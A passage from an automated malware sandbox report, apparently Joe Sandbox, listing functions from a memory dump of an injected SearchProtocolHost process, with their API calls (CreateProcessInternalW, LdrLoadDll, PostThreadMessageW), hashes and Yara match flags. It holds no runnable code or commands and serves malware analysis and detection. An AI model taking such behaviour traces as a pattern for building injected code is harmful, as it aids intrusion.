                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 51aa179b2295ef0189b29be290d85c1ee0295b0977f5bdcba1e9c8951f3831b5
                                • Instruction ID: 73f10a435ce86e413a62f1d55d8d7853be59f31729a25bf0b70ead84e3cfa022
                                • Opcode Fuzzy Hash: 51aa179b2295ef0189b29be290d85c1ee0295b0977f5bdcba1e9c8951f3831b5
                                • Instruction Fuzzy Hash: 43900229231C4442D200B56D4C54B07100587D0303F55C119A0154954CCA168E615621
                                Function 033B2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 8d0fafc5d8953d0defb82923aab4bfd168e32a01020caebfdf9707c19250a9cd
                                • Instruction ID: fbe1c254ab518e9d15a0419710b402b4f96e1c18a8e32fb880c8b7cc941958e8
                                • Opcode Fuzzy Hash: 8d0fafc5d8953d0defb82923aab4bfd168e32a01020caebfdf9707c19250a9cd
                                • Instruction Fuzzy Hash: 1890022962144902D101B15D4444616100A87D0241F95C026A1024955ECB268F92A231
                                Function 033B2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: d4b4be338cf4576f80b497b7b2d89731e4f2d5f331a8b4aba27f56874d34808c
                                • Instruction ID: b7c28530157498a75965e7f57b4ed87a6d49adcc842cc7af387dfe79c24bd61a
                                • Opcode Fuzzy Hash: d4b4be338cf4576f80b497b7b2d89731e4f2d5f331a8b4aba27f56874d34808c
                                • Instruction Fuzzy Hash: 9190026922184803D140B55D4844607100587D0302F55C015A2064955E8B2A8E516235
                                Function 033B2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 3dae13f8e8b6ae4c64c3f30edc3af85f3625fc0f5a8f00317083be29b408c76b
                                • Instruction ID: 7db28986ab79969d45f11f148f40f67871c2b2b7b336d8238c2ec6cf919cc8b9
                                • Opcode Fuzzy Hash: 3dae13f8e8b6ae4c64c3f30edc3af85f3625fc0f5a8f00317083be29b408c76b
                                • Instruction Fuzzy Hash: E590022932144403D140B15D54586065005D7E1301F55D015E0414954CDA168E565322
                                Function 033B2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: fa29a2a3ead3d1877dfcd20d3c8e258e13a691e3979c310de304a8196b1a4923
                                • Instruction ID: 5afdbf31ec4ce0af1abf8653a51136031815e78ff61454c10551f64f30b81d34
                                • Opcode Fuzzy Hash: fa29a2a3ead3d1877dfcd20d3c8e258e13a691e3979c310de304a8196b1a4923
                                • Instruction Fuzzy Hash: 4290022D23344402D180B15D544860A100587D1202F95D419A0015958CCA168E695321
                                Function 033B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: ee46f878f78c077e9ba229c45fc51cf02d00c0191ce9674394d359b53cedbd37
                                • Instruction ID: e24153bf32161a2e8a823b37ba5de978914dfa8e7415b632e564e792c718b4ed
                                • Opcode Fuzzy Hash: ee46f878f78c077e9ba229c45fc51cf02d00c0191ce9674394d359b53cedbd37
                                • Instruction Fuzzy Hash: 3890023922144813D111B15D4544707100987D0241F95C416A0424958D97578F52A221
                                Function 033B2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 483899df4d4c1d028456534fe8f0930f6c4b40e00b8ce2276e80ce807423a66f
                                • Instruction ID: 34c47198fdaf3747257840440d4322d2377797b3c50b19c8f6d808c3457b938e
                                • Opcode Fuzzy Hash: 483899df4d4c1d028456534fe8f0930f6c4b40e00b8ce2276e80ce807423a66f
                                • Instruction Fuzzy Hash: CD900229262485525545F15D4444507500697E0241795C016A1414D50C86279E56D721
                                Function 033B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: c2ce661809e40dcc89bc43078cfbfca3216b7237b35e079b3b3990999db54369
                                • Instruction ID: fdc6f257ea402217e29010b26df461a82b529aa29423d1856b679028695bef28
                                • Opcode Fuzzy Hash: c2ce661809e40dcc89bc43078cfbfca3216b7237b35e079b3b3990999db54369
                                • Instruction Fuzzy Hash: 299002392214CC02D110B15D844474A100587D0301F59C415A4424A58D87968E917221
                                Function 033B2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: d2fdb5d1d1b0513675ca932c0848ff6f15b61a26ebdfdd45489694a25b777af2
                                • Instruction ID: 8e2ded91362afcf12be99c5cf6396079a86e60c5e55b471b7845dbab1048a5e8
                                • Opcode Fuzzy Hash: d2fdb5d1d1b0513675ca932c0848ff6f15b61a26ebdfdd45489694a25b777af2
                                • Instruction Fuzzy Hash: 8790023922144C42D100B15D4444B46100587E0301F55C01AA0124A54D8716CE517621
                                Function 033B2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: a91149e980407c652f7738f70e22f6cf75eecf69dc4b7541e83ee936a6a5306d
                                • Instruction ID: 493a57c46457fddcaa2e046ebf84e27ef5cb7919a9076be11c2e1d2be216f41f
                                • Opcode Fuzzy Hash: a91149e980407c652f7738f70e22f6cf75eecf69dc4b7541e83ee936a6a5306d
                                • Instruction Fuzzy Hash: 9990023922144802D100B59D5448646100587E0301F55D015A5024955EC7668E916231
                                Function 02C11308 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 02C113A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387
                                • Opcode ID: 1fbf257c3524e8e9461346cc8b57cc943d525eda425280e3a3a55e29a63ef377
                                • Instruction ID: f4ef909f779645e4a9dcb8f2f0273ebb74a554c58591d530dc045c0fd6d0d3c0
                                • Opcode Fuzzy Hash: 1fbf257c3524e8e9461346cc8b57cc943d525eda425280e3a3a55e29a63ef377
                                • Instruction Fuzzy Hash: 2001C472D4015D7ADB11DAD48C81DFF7B7DDF42798F848064FA08AB180E6685E069BB1
                                Function 02C1132A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 584 2c1132a-2c11342 585 2c1134a-2c1139a call 2c2c510 call 2c14ad0 call 2c013e0 call 2c22130 584->585 586 2c11345 call 2c2bb00 584->586 595 2c113ba-2c113c0 585->595 596 2c1139c-2c113ab PostThreadMessageW 585->596 586->585 596->595 597 2c113ad-2c113b7 596->597 597->595
                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 02C113A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387
                                • Opcode ID: 5525a5ddf2e2cea4426f67373df64fa100ab236d58e1c5d6a463327440140a7d
                                • Instruction ID: 4c3cfa98eef3ef2fad8d59b12eda18d1dafb817202b68ff476cc9913d904c066
                                • Opcode Fuzzy Hash: 5525a5ddf2e2cea4426f67373df64fa100ab236d58e1c5d6a463327440140a7d
                                • Instruction Fuzzy Hash: 6B01C8B2D4115C7ADB109AE08C81DFF7B7CDF41394F448064FA18BB140EA785E069BB1
                                Function 02C11330 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 598 2c11330-2c11342 599 2c1134a-2c1139a call 2c2c510 call 2c14ad0 call 2c013e0 call 2c22130 598->599 600 2c11345 call 2c2bb00 598->600 609 2c113ba-2c113c0 599->609 610 2c1139c-2c113ab PostThreadMessageW 599->610 600->599 610->609 611 2c113ad-2c113b7 610->611 611->609
                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 02C113A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387
                                • Opcode ID: 692d68608804055d39653bc22379d17c4a8c8fb76ff200509b55fe78f117e238
                                • Instruction ID: b6cbfd56ca7834bdb0d96e01faefc11658544e7b8da0e4381a72b7789517e7ce
                                • Opcode Fuzzy Hash: 692d68608804055d39653bc22379d17c4a8c8fb76ff200509b55fe78f117e238
                                • Instruction Fuzzy Hash: 0201D6B1D4021C7ADB10AAE08C81DFF7B7CDF41794F448064FE08B7140EA685E069BB1
                                Function 02C23F70 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(000007D0), ref: 02C2404B
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: net.dll$wininet.dll
                                • API String ID: 3472027048-1269752229
                                • Opcode ID: bda89dd8355067ba78958e73f398766ed14eb9d2e24cda2f9645e9402fffc9ac
                                • Instruction ID: 9490ac803cf9072376746144b89a673f3b27811b24490004abfeb36cd0229ac5
                                • Opcode Fuzzy Hash: bda89dd8355067ba78958e73f398766ed14eb9d2e24cda2f9645e9402fffc9ac
                                • Instruction Fuzzy Hash: FC318DB1600705BBC724DFA4CC80FEBB7B9FB84704F144518EA196B280D7B4AA44CFA5
                                Function 02C1FA30 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitializeUninitialize
                                • String ID: @J7<
                                • API String ID: 3442037557-2016760708
                                • Opcode ID: 681e35e612ccdbe5926802b788016620fb973cc5e9d126763f8802270c231e4c
                                • Instruction ID: 2031661377d9df6ed17bc412bfcbdcf086ac633b3fdf2ef166b23a2baf9aa177
                                • Opcode Fuzzy Hash: 681e35e612ccdbe5926802b788016620fb973cc5e9d126763f8802270c231e4c
                                • Instruction Fuzzy Hash: E73130B5A0060AAFDB00DFD8D8809EFB7B9FF89304B108559E505EB214DB75EE45DBA0
                                Function 02C14AD0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02C14B42
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                • Opcode ID: 3fe8b4b3c928643f2372ef665b4a9745e3ad0373b24b018f6ca483aa9f35663e
                                • Instruction ID: cc7202f27902d04bab1588800c3d961821fc40719c103dd90543d72b66f1d759
                                • Opcode Fuzzy Hash: 3fe8b4b3c928643f2372ef665b4a9745e3ad0373b24b018f6ca483aa9f35663e
                                • Instruction Fuzzy Hash: 680121B5E4020DABDF24EBE4DC46F9DB3799B44308F004195ED0897240FA75EB18DB91
                                Function 02C29DB0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,02C1889E,00000010,?,?,?,00000044,?,00000010,02C1889E,?,?,?), ref: 02C29E10
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID:
                                • API String ID: 2186235152-0
                                • Opcode ID: 9ff334a6666430f607ac30a1fc05a868ddc9f70133b5539e05797cf58e506fa8
                                • Instruction ID: 14a132e90f6a168e2cb0449d2cd32a8be91dfb70c1a6491c837b27e8b3c7e1d8
                                • Opcode Fuzzy Hash: 9ff334a6666430f607ac30a1fc05a868ddc9f70133b5539e05797cf58e506fa8
                                • Instruction Fuzzy Hash: 6A0192B2215508BBCB44DE9DDC80EDB77AEEF8D754F148108BA09E3240D670F951CBA4
                                Function 02C09E5A Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C09EA2
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: a9edb91c7b1d4300839a0cf771e44ca256c6a2d317f2852275e2dba345be1cb0
                                • Instruction ID: 1acca9739343d552d28c8201e09831e43af61bd49d2598f57ca8c867fc7b73f4
                                • Opcode Fuzzy Hash: a9edb91c7b1d4300839a0cf771e44ca256c6a2d317f2852275e2dba345be1cb0
                                • Instruction Fuzzy Hash: 48F065726406143AD23061958C42F97769D8B91B51F180014F70EAB5C0D996B90546E5
                                Function 02C09E60 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C09EA2
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 3a042a40bf2d344048b37cc41a958727d11a27267487a528f0a4ca0fa14fe4a4
                                • Instruction ID: 8495d24f0a97d7c2685709184eb90f8f4bd6416842eb6ed158dc09865716bb63
                                • Opcode Fuzzy Hash: 3a042a40bf2d344048b37cc41a958727d11a27267487a528f0a4ca0fa14fe4a4
                                • Instruction Fuzzy Hash: DAF06D337802243AE33066A99C42F9BB29D8BC0BA1F180425FB0DEA1C0D996F90246E5
                                Function 02C28910 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02C28950
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$NameName_
                                • String ID:
                                • API String ID: 3514427675-0
                                • Opcode ID: 8906620b301fca26093fa71b4945bc7219e5667bd94e7205aed39e737d1621f1
                                • Instruction ID: bac5cf1b823a2cbf36526e751c056ac3c1a7fc6ed573c7f6a389923294cc486e
                                • Opcode Fuzzy Hash: 8906620b301fca26093fa71b4945bc7219e5667bd94e7205aed39e737d1621f1
                                • Instruction Fuzzy Hash: 0CF039B52002487BDA10EF99DC45EEB77AEEFC9710F008009FD08A7241D671B9508BB4
                                Function 02C29CD0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(02C11FC6,?,02C25BA7,02C11FC6,02C25B7F,02C25BA7,?,02C11FC6,02C25B7F,00001000,?,?,00000000), ref: 02C29D0C
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 410d0e9143d4020b8a6aae258be14db686c65e6f57224d5bd35b00bbd2e1ea86
                                • Instruction ID: 522cb0c36cfaacbe4647eae3a14310cd1d13bb873a24543fe2e6bf3c19d23b0e
                                • Opcode Fuzzy Hash: 410d0e9143d4020b8a6aae258be14db686c65e6f57224d5bd35b00bbd2e1ea86
                                • Instruction Fuzzy Hash: 81E01AB2200614BBD614EE99DC41FAB77AEEFC9710F048419FA48A7281DA71B9148BB5
                                Function 02C29D20 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B5A8279,00000007,00000000,00000004,00000000,02C14346,000000F4), ref: 02C29D5C
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: bf9b3b606b360d8ef7542bf77a1065b0c88594b9b14cd1931fab7db17ec5ce49
                                • Instruction ID: 69ded789e1ff4e44cd890ad078776656e7236ec39bdb6c553c99346ffa07eabb
                                • Opcode Fuzzy Hash: bf9b3b606b360d8ef7542bf77a1065b0c88594b9b14cd1931fab7db17ec5ce49
                                • Instruction Fuzzy Hash: 2AE0E5B22002147BD614EEA9DC41FAB77AEEFC9714F008419FE0CA7242D671B9118AB4
                                Function 02C188D9 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02C18909
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: b64cd3088d57299f006d2144f2dd22205a2be18e1a8b62302458b3ac9f14a2ca
                                • Instruction ID: 15898500a4c10138f3204a3633c477e02bc0ff7e1444f0f732615b973b79ca03
                                • Opcode Fuzzy Hash: b64cd3088d57299f006d2144f2dd22205a2be18e1a8b62302458b3ac9f14a2ca
                                • Instruction Fuzzy Hash: 6AE026B52441042BFB146A64CDCAF6633198B8B334F144740FDA99F2D1DA38F7439611
                                Function 02C188E0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02C18909
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 189e4131bda6a056bbe77cef3749e5c1df9441e0e3577c11dce73310449b61ed
                                • Instruction ID: bffcf869dabf80f0b04315e79868175aaa650056a92863cbd20bc3e15686aa2c
                                • Opcode Fuzzy Hash: 189e4131bda6a056bbe77cef3749e5c1df9441e0e3577c11dce73310449b61ed
                                • Instruction Fuzzy Hash: A5E0263125820427FB1469A8DC86F2233498B8A738F084710F95CCB2C1E638F7029551
                                Function 02C186CC Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNELBASE(00008003,?,?,02C122C0,02C284BF,02C25B7F,02C12286), ref: 02C18700
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode
                                • String ID:
                                • API String ID: 2340568224-0
                                • Opcode ID: 092f0628f89f03584e5c3979026b1bac0245095a796410902dd667b56cb636f2
                                • Instruction ID: 3d63a71eb681bd122942cdbea4b7e9c8b44bf1d3ee140fd0f08b857bdcc93c39
                                • Opcode Fuzzy Hash: 092f0628f89f03584e5c3979026b1bac0245095a796410902dd667b56cb636f2
                                • Instruction Fuzzy Hash: EAE05E727943113BF644EAF4DC83F56328D9F41B94F088014FA4CDB2C1ED94E6015AA5
                                Function 02C186D0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNELBASE(00008003,?,?,02C122C0,02C284BF,02C25B7F,02C12286), ref: 02C18700
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode
                                • String ID:
                                • API String ID: 2340568224-0
                                • Opcode ID: bb3691908fe1ba9ff47754a9463860947e2cc0d3b22c0bc9e740cf0158c6f297
